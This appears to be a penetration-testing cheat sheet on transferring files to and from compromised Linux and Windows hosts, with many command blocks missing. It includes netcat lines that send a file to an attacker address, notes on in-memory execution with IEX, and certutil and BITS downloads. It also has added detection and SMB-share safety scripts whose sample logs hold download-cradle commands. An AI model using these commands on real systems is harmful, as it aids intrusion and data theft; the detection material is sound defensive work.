Transferring files
The first step after gaining access to a remote machine is to upload new tools.
Linux
Netcat
On the target, run:
nc -lvp 443 > transfer.txt
On the attacker machine, run:
nc $ip 443 < transfer.txt
or
On the attacker machine, run:
nc -lvp 443 > transfer.txt
On the target, run:
cat transfer.txt | nc $attackerip 443
The attack box can now connect to port 443 and download a file called transfer.txt
ProTip
If you ever happen to have a shell on a UNIX system and cannot find a way to upload anything, this is a lifesaver trick you can try:
On local system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On Target System:
echo <copiedContent> | base64 -d > filetoupload
Start a web server on your local machine serving the files in the current folder:
Send files using different commands:
As an FTP server, metasploit has built in one:
Simple, fast Python FTP server; no login details necessary:
SMB share server:
Curl put:
Linux, mounting a samba share:
Simple HTTP Server with Upload

PHP
Python
Windows
In most environments, HTTP/HTTPS traffic is allowed out of the firewall in some form - and if we have a GUI session, a web browser could also be used. However, from a Windows shell, PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP.
From PowerShell 3.0, Invoke-WebRequest is also available, but it is noticeably slower at downloading files. The aliases iwr, curl, and wget can be used instead of Invoke-WebRequest.
Instead of downloading to disk, the payload can be executed in memory using Invoke-Expression, or its alias iex.
IEX also accepts pipeline input.
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.


This can be bypassed using the parameter -UseBasicParsing.
Alternatively, with administrative access to the machine, we can disable Internet Explorer’s First Run customization.
PowerShell download cradles that do not observe Internet Explorer's first-run check can also be used. Harmj0y has compiled an extensive list of PowerShell download cradles here. It is worth gaining familiarity with them and their individual nuances, such as not observing a proxy or not touching disk, in order to select the appropriate one for the situation.
PowerShell File Uploads
It is also possible to upload files using Powershell using Invoke-WebRequest or Invoke-RestMethod.
After catching the base64 data with Netcat, the payload can be decoded.
Bitsadmin
The Background Intelligent Transfer Service (BITS) can download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work.
PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Download
Upload
Certutil
Casey Smith (@subTee) found that certutil can be used to download arbitrary files. It is available in all Windows versions and has been a very popular file transfer technique, essentially serving as Wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious certutil usage.
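From the defender's side, every transfer method in this Windows section (and the netcat and base64 tricks above) leaves recognisable traces in process-creation and PowerShell script-block logging. The script below is an added Python example, not code from this page or from any tool it names: it runs a handful of coarse regex rules over constructed log lines (the host 10.0.0.5 and the file names are placeholders) and reports which technique each line resembles, the kind of first-pass triage an analyst runs before writing proper signatures.

```python
"""Triage endpoint telemetry for the file-transfer techniques covered on this
page (certutil, BITS, WebClient, Invoke-WebRequest, IEX, netcat, base64).

Added example, not code from the page or from any of the tools it names. The
log lines in SAMPLE_LOG are constructed for illustration; the 10.0.0.5 host
and the file names in them are placeholders. The patterns are coarse
heuristics for triage, not production detection signatures.
"""
import re
from collections import Counter

# (technique, pattern). The order only determines the order of reported hits.
RULES = [
    ("certutil download",
     re.compile(r"certutil(?:\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin transfer",
     re.compile(r"bitsadmin(?:\.exe)?\b.*/transfer", re.I)),
    ("BITS PowerShell cmdlet",
     re.compile(r"Start-BitsTransfer", re.I)),
    ("WebClient download",
     re.compile(r"Net\.WebClient.*Download(?:File|String)", re.I)),
    ("Invoke-WebRequest download",
     re.compile(r"(?:Invoke-WebRequest|\biwr\b).*https?://", re.I)),
    ("in-memory execution (IEX)",
     re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("netcat transfer",
     re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\s+.*\b\d{2,5}\b", re.I)),
    ("base64 decode on target",
     re.compile(r"base64\s+(?:-d|--decode)\b|certutil(?:\.exe)?\b.*-decode", re.I)),
]

# Constructed sample telemetry: Windows event ids 4688 (process creation) and
# 4104 (script block) plus two Linux auditd-style lines. Not real captures.
SAMPLE_LOG = [
    "4688 New Process: certutil.exe -urlcache -split -f http://10.0.0.5/tool.exe C:\\Users\\Public\\tool.exe",
    "4104 ScriptBlock: IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/run.ps1')",
    "4688 New Process: bitsadmin.exe /transfer job /download /priority normal http://10.0.0.5/x.zip C:\\x.zip",
    "4104 ScriptBlock: Invoke-WebRequest -Uri http://10.0.0.5/a.txt -OutFile a.txt -UseBasicParsing",
    "4688 New Process: notepad.exe C:\\Users\\alice\\notes.txt",
    "auditd: echo aGVsbG8K | base64 -d > /tmp/tool",
    "auditd: cat transfer.txt | nc 10.0.0.5 443",
]


def classify(line: str) -> list[str]:
    """Return the name of every rule the line matches (empty list if none)."""
    return [name for name, rx in RULES if rx.search(line)]


def triage(lines):
    """Yield (line, techniques) for every line that matches at least one rule."""
    for line in lines:
        hits = classify(line)
        if hits:
            yield line, hits


def technique_counts(lines) -> Counter:
    """Count how often each technique appears across the given lines."""
    counts: Counter = Counter()
    for _, hits in triage(lines):
        counts.update(hits)
    return counts


if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG):
        print(f"{', '.join(hits):40s} | {line}")
    print(technique_counts(SAMPLE_LOG))
```

The rules deliberately key on the arguments that make a legitimate binary do a download (`-urlcache`, `/transfer`, a URL after `Invoke-WebRequest`) rather than on the binary name alone, which is why the benign notepad line produces no hit; tune the patterns to your own baseline before relying on them.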
nc.exe: paste the following code
Echo up
https://pentest.ws/e/mQx1MdxD#tools/echo-up
Bounce port scanning
Nice trick to share folders with RDP:
With Powershell:
Powercat
Installs to /usr/share/windows-resources/powercat
wget
Paste the following block in a command line to get a web client:
Run with:
HTTP: Powershell
SMB
Impacket SMBServer
Impacket is my preferred method of setting up a file transfer over SMB because it does not run in the background or involve modifying configuration files. We can use smbserver.py specifically. If other people attempt to connect to the service, it has the bonus that it will display a NetNTLMv2 hash that, if successfully cracked, will reveal the password.
Impacket SMBServer - Syntax
It is essential to always use a separate folder for file transfers, to prevent unauthorized persons from gaining access to our local data. For example, if we used our home directory to transfer the data and an unauthorized person accessed the share, they could navigate to the ".ssh" directory and find SSH keys that can be used against us.
We can set up an SMB share on our Pwnbox called "FileTransfer", but first we create a dedicated folder for it. Then we share our current working directory.
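One way to enforce the "dedicated folder" rule before starting an SMB server, as an added Python example that is not part of this page or of Impacket: it refuses a share root that is the home directory, an ancestor of it, the filesystem root, or a folder that exposes credential material such as .ssh. The directory layout built in demo() is constructed for the demonstration.

```python
"""Preflight check for a directory that is about to be served over SMB.

Added example, not code from the page or from Impacket. It encodes the
advice above: serve a dedicated folder, never the home directory or a folder
that contains credential material such as ~/.ssh. The directory layout in
demo() is constructed for illustration.
"""
from pathlib import Path
import tempfile

# Directory and file names that must never be reachable from a shared root
# (constructed list; extend it for your environment).
SENSITIVE_NAMES = {".ssh", ".gnupg", ".aws", ".kube", ".netrc", ".bash_history"}


def share_problems(share_root: Path, home: Path) -> list[str]:
    """Return the reasons share_root is unsafe to export; an empty list means OK."""
    share_root = share_root.resolve()
    home = home.resolve()
    problems: list[str] = []

    if not share_root.is_dir():
        return ["share root does not exist or is not a directory"]
    if share_root == home:
        problems.append("share root is the home directory")
    elif home.is_relative_to(share_root):
        problems.append("share root is an ancestor of the home directory")
    if share_root == Path(share_root.anchor):
        problems.append("share root is the filesystem root")

    # Walk everything below the share root so a sensitive folder nested a few
    # levels down is caught as well, not just direct children.
    for path in share_root.rglob("*"):
        if path.name in SENSITIVE_NAMES:
            problems.append(f"share root exposes {path.relative_to(share_root)}")
    return problems


def demo() -> tuple[list[str], list[str]]:
    """Build a throwaway home directory holding an .ssh folder plus a dedicated
    FileTransfer folder, and check both as candidate share roots."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "home" / "user"
        (home / ".ssh").mkdir(parents=True)
        # Constructed placeholder file standing in for a private key.
        (home / ".ssh" / "id_ed25519").write_text("placeholder, not a real key\n")
        transfer = home / "FileTransfer"
        transfer.mkdir()
        return share_problems(home, home), share_problems(transfer, home)


if __name__ == "__main__":
    bad, good = demo()
    print("home directory as share root:", bad)
    print("dedicated folder as share root:", good or "OK")
```

Run the check against the folder you intend to pass to smbserver.py and only start the server when the returned list is empty.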
To verify the share was created and accessible, we can run:
Going to our Impacket terminal, we can see the connection. If we did not already know the user's password, we could feed the line under "Authenticated Successfully" to Hashcat and attempt to crack it.
Impacket SMBServer - Listening
In some cases, computers will not allow anonymous SMB connections. In this case, we may want to use the user/password flags to allow authentication on our SMB server. This can be done with the following command: